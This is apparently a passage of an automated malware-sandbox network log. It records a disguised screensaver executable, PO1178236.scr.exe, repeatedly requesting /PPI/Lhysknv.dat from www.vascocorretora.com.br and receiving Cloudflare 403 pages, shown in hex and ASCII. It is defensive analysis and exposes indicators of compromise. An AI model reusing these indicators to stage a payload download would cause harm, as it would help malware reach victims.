        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:20 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:20 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:20 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 65 63 31 39 32 31 34 32 38 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2ec1921428f</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:20 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 65 63 31 39 32 31 34 32 38 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2ec1921428f',t:'MTczNjQwODI0MC4wMDAwMDA='};var a
        2025-01-09 07:37:20 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        136192.168.2.949845188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:20 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:20 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:20 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:35 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idt6Z2Rcvk4hDLxwgFFCIUDzzTOd%2BEfKT9ql1BukHPg%2BzHWH%2BcFRaEIB3XKaZQp3RMr%2FsmhMyF5i7M%2BwHQNmZdUXr%2BcbNvN3GtRpzBvcNTIgOWWpUbLJZECpyEKopI6Dp%2Br%2FJClWxDNGDtss"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2efeba242cd-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1708&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1644144&cwnd=242&unsent_bytes=0&cid=948e7e1ca8ff5bdc&ts=148&x=0"
        2025-01-09 07:37:20 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:20 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:37:20 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:37:20 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 65 66 65 62 61 32 34 32 63 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2efeba242cd</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:37:20 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 65 66 65 62 61 32 34 32 63 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 43 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2efeba242cd',t:'MTczNjQwODI0MC4wMDAwMD
        2025-01-09 07:37:20 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        137192.168.2.949846188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:21 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:21 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:21 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:36 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5s4TGpVA9BZeqooItWhFckfBlbtVlnnkDYFYDCx20r24SQ6PBwuidghvJUUA7%2Fy0R7K7wiqFLFfULafk5LWxhHero4N%2B6ziut8fL7NXmXtkodSB6wuC4%2BUIHC6xoAZmYY8W%2BoMlZs8hiDoH8"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2f3c9c54376-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1602&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1822721&cwnd=248&unsent_bytes=0&cid=5a3b15ba401c6e43&ts=152&x=0"
        2025-01-09 07:37:21 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:21 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:21 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:21 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 66 33 63 39 63 35 34 33 37 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2f3c9c54376</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:21 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 66 33 63 39 63 35 34 33 37 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2f3c9c54376',t:'MTczNjQwODI0MS4wMDAwMDA='};var
        2025-01-09 07:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        138192.168.2.949847188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:21 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:21 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:21 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:36 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSlrzHUUIL38EAnyVlu1X3I5kCO1klFteot5w2jse7mhzgnA2BWbALO7q9uApKlMqRlRqSLtvZ9gf3f2a9ASd2A4doQzSk8AKI0QNz9s9C714PpCHonUJHqsPk1PStpX2MHuQ%2FwhxYe0Il07"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2f7880cc3f3-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1552&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1702623&cwnd=190&unsent_bytes=0&cid=662248fe3bb7a862&ts=148&x=0"
        2025-01-09 07:37:21 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:21 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
